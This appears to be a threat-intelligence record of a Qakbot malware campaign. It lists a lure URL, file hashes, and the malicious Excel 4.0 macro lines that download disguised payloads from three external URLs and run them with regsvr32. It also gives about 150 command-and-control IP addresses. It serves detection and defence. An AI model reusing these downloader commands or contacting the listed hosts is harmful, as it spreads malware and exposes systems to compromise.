Qakbot_AA_19.04.2022.txt
19.04.2022 | Qakbot | AA | Version 403.573 | Campaign | 1650264998
******************************
.url https://newcolors.com.uy/aqia/bqaouaoiamisrl
.zip b7c8c087b74a88f95e915cd22b357e38847b2aab1ef3f9f49fa46178ef42fb32
.xls 567a8a0e52a258d52c60f25778ad7ca368b9445d21dcdb8ebe0576a33fc8c8cd
.dll 29942eb47c0de0415b2507dff8822e3309dd4fcc2ac8d01434b37eb4f75efbe1
******************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Rfgsg", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://debtsolversuk.co.uk/HLpeQJZi/NbVfNbhn.png", "C:\Rfgsg\Jefseg.ooccxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://pablopereirasilvaluis.com.br/OHTvXEr9c/NbVfNbhn.png", "C:\Rfgsg\Jefsega.ooccxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://portalregionpuno.com/088aFy0Xc8ap/NbVfNbhn.png", "C:\Rfgsg\Jefsegb.ooccxx")
https://debtsolversuk.co.uk/HLpeQJZi/NbVfNbhn.png
https://pablopereirasilvaluis.com.br/OHTvXEr9c/NbVfNbhn.png
https://portalregionpuno.com/088aFy0Xc8ap/NbVfNbhn.png
*************************************************
Execution chain >>
EXCEL.EXE /dde C:\Users\Admin\AppData\Local\Temp\J-1514925657.xlsb
Regsvr32 /s calc
Regsvr32 C:\Rfgsg\Jefseg.ooccxx
Regsvr32 C:\Rfgsg\Jefsega.ooccxx
Regsvr32 C:\Rfgsg\Jefsegb.ooccxx
*************************************************
*************************************************
C2s (IP:port)
24.152.219.253:995
176.67.56.94:443
86.97.11.43:443
85.104.122.231:443
31.215.185.49:1194
86.195.158.178:2222
31.215.185.49:2222
46.198.215.152:995
81.215.196.174:443
109.228.220.196:443
190.73.3.148:2222
24.43.99.75:443
39.44.144.159:995
74.15.2.252:2222
83.110.91.58:443
38.70.253.226:2222
108.60.213.141:443
47.23.89.62:993
2.50.4.57:443
75.99.168.194:443
41.38.167.179:995
37.34.253.233:443
148.64.96.100:443
115.50.75.208:2222
140.82.49.12:443
1.161.67.235:443
85.246.82.244:443
47.23.89.62:995
180.183.134.56:2222
111.125.245.118:995
202.134.152.2:2222
82.152.39.39:443
84.241.8.23:32103
31.48.166.122:2078
41.107.224.251:443
143.0.219.6:995
46.107.48.202:443
179.174.52.27:32101
175.145.235.37:443
103.88.226.30:443
75.99.168.194:61201
203.122.46.130:443
86.98.156.198:993
5.32.41.45:443
117.248.109.38:21
102.140.71.156:443
72.76.94.99:443
189.27.113.73:443
121.7.223.59:2222
32.221.224.140:995
182.191.92.203:995
196.203.37.215:80
71.13.93.154:2222
45.9.20.200:443
173.174.216.62:443
45.76.167.26:995
144.202.2.175:995
144.202.3.39:443
144.202.2.175:443
140.82.63.183:443
149.28.238.199:443
45.63.1.12:443
45.76.167.26:443
149.28.238.199:995
140.82.63.183:995
144.202.3.39:995
45.63.1.12:995
142.184.161.168:2222
70.46.220.114:443
103.87.95.133:2222
1.161.67.235:995
37.186.54.254:995
217.164.76.203:2078
78.101.82.40:2222
197.167.63.31:993
39.52.115.81:995
121.74.167.191:995
24.178.196.158:2222
217.128.122.65:2222
86.98.208.214:2222
172.114.160.81:995
103.107.113.120:443
80.11.74.81:2222
92.132.172.197:2222
41.84.229.83:995
93.48.80.198:995
116.30.5.32:995
197.89.11.223:443
91.177.173.10:995
76.25.142.196:443
208.107.221.224:443
101.109.208.52:443
120.150.218.241:995
39.49.112.64:995
191.99.191.28:443
173.21.10.71:2222
103.139.243.207:990
174.69.215.101:443
45.46.53.140:2222
67.165.206.193:993
73.151.236.31:443
187.172.232.250:443
201.172.31.135:2222
43.252.72.97:2222
187.250.114.15:443
201.145.179.247:443
89.86.33.217:443
187.195.126.169:443
177.205.6.251:443
72.12.115.71:22
187.102.135.142:2222
100.1.108.246:443
201.13.50.41:32101
40.134.246.185:995
24.55.67.176:443
201.22.97.225:443
37.208.138.247:6883
24.139.72.117:443
179.158.105.44:443
187.207.47.198:61202
47.156.191.217:443
72.27.7.251:443
186.105.103.240:443
85.101.204.178:443
41.230.62.211:993
180.129.6.122:995
183.82.103.213:443
109.12.111.14:443
79.129.121.68:995
45.241.239.28:995
39.41.158.202:995
31.35.28.29:443
189.146.73.62:443
41.129.82.125:995
190.252.242.69:443
90.120.65.153:2078
102.182.232.3:995
184.100.157.205:443
72.66.116.235:995
47.158.25.67:443
47.180.172.159:443
77.104.81.12:443
5.95.58.211:2087
176.88.238.122:995
41.228.22.180:443
73.67.152.98:2222
76.70.9.169:2222
114.79.148.170:443
47.180.172.159:50010
72.252.201.34:990